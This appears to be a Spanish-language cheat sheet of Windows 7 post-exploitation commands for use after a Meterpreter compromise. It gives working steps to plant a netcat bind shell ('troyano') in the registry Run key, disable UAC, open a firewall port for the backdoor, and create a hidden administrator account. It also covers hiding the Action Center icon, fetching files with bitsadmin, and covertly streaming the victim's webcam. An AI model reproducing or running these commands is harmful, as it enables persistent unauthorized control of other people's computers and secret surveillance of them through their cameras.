Comandos Post Explotación Windows 7
ver que programas se inician con el sistema
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Agrega netcat al inico de windows el -L es para que sepueda conectar cuantas veces se guiera
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v troyano -d 'c:\Windows\system32\nc.exe -d -L -p 12345 -e cmd.exe'
Ver lo que hace el registro cuando se inicia el sistema en este caso el registro se llama troyano
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v troyano
Los siguientes comandos se ejecutan dentro la la consola de windows mas no en la de meterpreter
Desactiva el UAC
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Ver el estado del firewall
netsh firewall show state
Agrega una regla al firewall en este caso permite el puerto 12345
netsh advfirewall firewall add rule name="salida troyano" dir=in action= allow protocol=TCP localport=12345
Crea usuario y lo agreda al grupo administradores
net user remoto juancarlos /add agregar usuario net localgroup administradores remoto /add
Oculta el usuario de la vista de los otros usuarios.
Agrega la carpeta specialaccounts al registro ya que no esta creada
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts" reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts\userlist" reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts\userlist" /v remoto /t REG_DWORD /d 0 /f
Los primeros dos comando crean las carpetas que no estan. el ultimo comando le agrega el valor de que el usuario remoto con una valor cero para que no sea visto aca
Ocultar el icono de centro de activiades
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /t REG_DWORD /d 1 /f
el primer comando crea la carpeta en el registro y el segundo agrega el valor HideSCAHealth con valor 1 que significa desactivar y es 0 es activa
Descargar archivos desde CMD con Bitsadmin
Bitsadmin es como el wget de linux. Es una herramienta que trae por defecto Windows la he probado en Windows 7 y funciona no si el windows 8 10 y etc la traigan pero habria que probar.
Es una excelente herramienta
bitsadmin /Transfer imagen http://www.fermu.com/images/centro%20de%20actividades.png C:\Users\Interntet\Desktop\ima.png
Webcam
Lo primero que toca saber y si el equipo tiene camaras para ellos con el comando webcam_list nos aparece la lista de webcams y si la tiene hay viene lo buneno .
run webcam -p /root Ahora con este comando se obtendra algo como asi un video pero en tiempo real en en mozilla firefox pero en realidad son imágenes que se van tomando tan rapido que genera el efecto pero son EN TIEMPO REAL.
Con el comando anterior es como si tuiera solo una camara que por defecto tiene el valor unos pero si tuviera mas camaras con el comando de webcam_list aparecerían el listado ademas de un numero entonces para grabar en una camara diferente seria
run webcam -i 2 -p /root
el -p /root es la ruta donde se va a guarda las fotos que estara tomando cada instante.
O tambien simplemente con el comando
webcam_stream el automaticamente te abre el mozilla y te muesta todo lo que aparece delante de la camara